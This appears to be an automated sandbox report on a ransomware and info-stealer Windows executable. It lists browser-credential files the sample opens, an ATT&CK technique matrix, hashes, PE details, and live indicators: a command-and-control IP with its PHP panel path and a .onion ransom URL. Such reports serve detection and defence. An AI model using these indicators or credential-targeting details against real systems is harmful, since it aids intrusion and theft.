Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	3 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	1 Taint Shared Content	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	2 Data Encrypted for Impact
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Bootkit	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	Logon Script (Windows)	1 Bootkit	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Proxy	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
2b7cu0KwZl.exe	47%	ReversingLabs	Win64.Ransomware.GarrantyDecrypt

Source	Detection	Scanner	Label
http://api.ipify.org/6	0%	Avira URL Cloud	safe
http://193.143.1.139/Ujdu8jjooue/biweax.php1	0%	Avira URL Cloud	safe
http://193.143.1.139/9U6	0%	Avira URL Cloud	safe
http://193.143.1.139/Ujdu8jjooue/biweax.php1y6	0%	Avira URL Cloud	safe
http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO	0%	Avira URL Cloud	safe
http://193.143.1.139/	0%	Avira URL Cloud	safe
http://api.ipify.orgunknown------------------------multipart/form-data;	0%	Avira URL Cloud	safe
http://193.143.1.139/Ujdu8jjooue/biweax.php	0%	Avira URL Cloud	safe
http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl	0%	Avira URL Cloud	safe
http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.13.205	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://api.ipify.org/	2b7cu0KwZl.exe, 00000000.00000003.1805381540.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1804619437.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1805035456.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1819160509.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1808182808.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1808323206.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://193.143.1.139/Ujdu8jjooue/biweax.php	2b7cu0KwZl.exe	false	Avira URL Cloud: safe	unknown
http://api.ipify.orgunknown------------------------multipart/form-data;	2b7cu0KwZl.exe	false	Avira URL Cloud: safe	unknown
http://193.143.1.139/9U6	2b7cu0KwZl.exe, 00000000.00000003.1821529749.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832275770.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825034317.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833404082.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829943691.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1831719140.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830337644.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827170187.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829430448.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832820189.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828747196.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829036005.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830881739.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825604403.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1821872031.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830557344.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833273656.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828885190.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827723636.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822607000.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO	RECOVERY INFO.txt62.0.dr, RECOVERY INFO.txt283.0.dr, RECOVERY INFO.txt37.0.dr, RECOVERY INFO.txt10.0.dr, RECOVERY INFO.txt196.0.dr, RECOVERY INFO.txt304.0.dr, RECOVERY INFO.txt153.0.dr, RECOVERY INFO.txt89.0.dr, RECOVERY INFO.txt257.0.dr, RECOVERY INFO.txt155.0.dr, RECOVERY INFO.txt56.0.dr, RECOVERY INFO.txt52.0.dr, RECOVERY INFO.txt275.0.dr, RECOVERY INFO.txt115.0.dr, RECOVERY INFO.txt253.0.dr, RECOVERY INFO.txt106.0.dr, RECOVERY INFO.txt17.0.dr, RECOVERY INFO.txt111.0.dr, RECOVERY INFO.txt46.0.dr, RECOVERY INFO.txt66.0.dr, RECOVERY INFO.txt42.0.dr	true	Avira URL Cloud: safe	unknown
http://api.ipify.org/6	2b7cu0KwZl.exe, 00000000.00000003.1817076512.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822753296.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1804503862.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1819426905.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822334255.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1805117359.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d	2b7cu0KwZl.exe, 00000000.00000003.1852408139.000001F7CBE26000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1852516311.000001F7CA886000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://193.143.1.139/Ujdu8jjooue/biweax.php1	2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820510829.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl	2b7cu0KwZl.exe, 00000000.00000003.1852408139.000001F7CBE26000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1852516311.000001F7CA886000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://193.143.1.139/	2b7cu0KwZl.exe, 00000000.00000003.1821529749.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825034317.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827170187.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829430448.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828747196.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829036005.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825604403.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1821872031.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828885190.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827723636.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822607000.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820510829.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827950839.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828495183.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1823027740.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://193.143.1.139/Ujdu8jjooue/biweax.php1y6	2b7cu0KwZl.exe, 00000000.00000003.1821529749.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832275770.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825034317.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833404082.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829943691.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1831719140.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830337644.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827170187.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829430448.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832820189.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828747196.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829036005.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830881739.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825604403.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1821872031.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830557344.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833273656.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828885190.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827723636.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822607000.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.ipify.org	2b7cu0KwZl.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.143.1.139	unknown	unknown		57271	BITWEB-ASRU	false
104.26.13.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1548500
Start date and time:	2024-11-04 15:20:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2b7cu0KwZl.exe renamed because original name is a hash value
Original Sample Name:	e21cbdbf6414ffc0ef4175295c7e188800a66b7b83302bd35b7e3fd6fabfccde.exe
Detection:	MAL
Classification:	mal84.rans.spre.spyw.evad.winEXE@1/1281@1/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeleteValueKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtSetValueKey calls found.
Report size getting too big, too many NtWriteFile calls found.
VT rate limit hit for: 2b7cu0KwZl.exe

Simulations

Behavior and APIs

Time	Type	Description
09:21:12	API Interceptor	4x Sleep call for process: 2b7cu0KwZl.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.143.1.139	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	193.143.1.139/Ujdu8jjooue/biweax.php
104.26.13.205	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	172.67.74.152
	Payslip_October_2024_pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Quotation.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Copia de pago de la Orden de compra OI16014 y OI16015.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	QUOTATION#09678.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Payslip_October_2024_pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	V7FWuG5Lct.exe	Get hash	malicious	Quasar	Browse	172.67.74.152
	7ll96oOSBF.exe	Get hash	malicious	Quasar	Browse	104.26.12.205
	Payload 94.75 (4).225.exe	Get hash	malicious	Kronos, Strela Stealer	Browse	104.26.12.205
	Ordine d'acquisto OI16014 e OI1601.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Purchase order.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	172.67.74.152
	Quote_General_Tech_LLC_637673,PDF.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	jCN22OTVxq.lnk	Get hash	malicious	Unknown	Browse	104.21.73.244
	Cxn80OsiM7.lnk	Get hash	malicious	Unknown	Browse	104.21.73.244
	r96vfq6E6O.lnk	Get hash	malicious	Unknown	Browse	172.67.193.120
	MvUoLtpUWG.lnk	Get hash	malicious	Unknown	Browse	172.67.193.120
	IFeOeQQTXe.lnk	Get hash	malicious	Unknown	Browse	172.67.193.120
BITWEB-ASRU	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	193.143.1.139
	https://caraccidentdefencelawyer.com/LBKQgs7C#3l3f816z5y810bbd3w5muypm6py7liz04w39	Get hash	malicious	GRQ Scam	Browse	193.143.1.195
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
	IWnUKXop2x.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
	LNLAncf2v5.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
	h3G4uG7Kqi.elf	Get hash	malicious	Mirai	Browse	45.133.217.107

Process:	C:\Users\user\Desktop\2b7cu0KwZl.exe
File Type:	data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	5.712669806105628
Encrypted:	false
SSDEEP:	3:PWDKk/3ll/lsltlCs6QyI6NhqOXB20GF6ubk9Hyc00WAn:PWiSPjI6NhbBR9ScPWA
MD5:	E498E100DBB0BD5C55B74D7B416F9211
SHA1:	35630131E41221611C2A6268B4173DF09AC85FB1
SHA-256:	3C678174EF610EAE08C1F595CC2DA676883844B929F4ED4735EF3730C5D44709
SHA-512:	4C3E30013807CA07E5B71DCDFC475214963D4F4C27E3E66D0E1CB5515443C02203169F528CE146C92EA13CD9A3052AA198E3A1170C6D42B6B07E0313B41CD2C5
Malicious:	false
Reputation:	low
Preview:	.%Y.3..^.!2A........(...........................W...2.....W..p.22..d.U4.\|.S!f..Mp.i(+.(....'hy.TK.........m.J.iJ..5.C.....j.b.p...5uD3$.

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.4272263274140755
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	2b7cu0KwZl.exe
File size:	726'016 bytes
MD5:	0d7e80ec85db5cb45642235cb2381a0c
SHA1:	f0a15a7ecaff7d0659bab2a416e5d668ff67724e
SHA256:	e21cbdbf6414ffc0ef4175295c7e188800a66b7b83302bd35b7e3fd6fabfccde
SHA512:	bb54a37b50b26b33724462faaf5d8d6328721a980bb51a95cfffce048d1ccca4050ee0a3740f47604de6504de70026c5f1567efe8be3913cea2ef9f1012a8921
SSDEEP:	12288:klXYLQe1BJTAhHvVIgLfnEYbLrOqP0NbuLyoHNAoBmbgLO:klip10hREYbLrBWbuLod
TLSH:	BBF48D26B7AC01F8E0B7D139C9464516F7F2B84A236187DF03A147AA5F276E45E3E321
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....o.g...............)............L:.........@.....................................-....`................................

Entrypoint:	0x140053a4c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x671F6FE1 [Mon Oct 28 11:05:05 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	88c2ebb7280c5627ea5c203cde572357

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa73b4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbb000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xb5000	0x56c4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbc000	0x1078	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9a9f0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x9ac00	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x9a8b0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x83000	0x5e8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x81ba0	0x81c00	761df415b612f4c29aa6ccd0f97ffc61	False	0.47046039559248554	data	6.47166308919593	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x83000	0x25872	0x25a00	e9a04a140fab68a09ad318f3b246d515	False	0.43398307724252494	OpenPGP Secret Key	5.373035821089337	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa9000	0xb43c	0x2e00	67bf567798d3b66a7d5492f33568c38c	False	0.15743885869565216	DIY-Thermocam raw data (Lepton 2.x), scale -24371-2112, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 13712.311523	4.024101981093241	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xb5000	0x56c4	0x5800	fd4920488f7d5331a3cece0172b6ac8a	False	0.4782936789772727	PEX Binary Archive	5.839360561248483	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xbb000	0x1e0	0x200	485e8ed8b860706f5089de5f4f806a30	False	0.53125	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbc000	0x1078	0x1200	67a030f47a5626f12858cae5a511c3eb	False	0.3982204861111111	data	5.271003264193856	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

DLL	Import
bcrypt.dll	BCryptGenRandom
SHLWAPI.dll	SHDeleteKeyW, wnsprintfW, PathFileExistsW, wnsprintfA
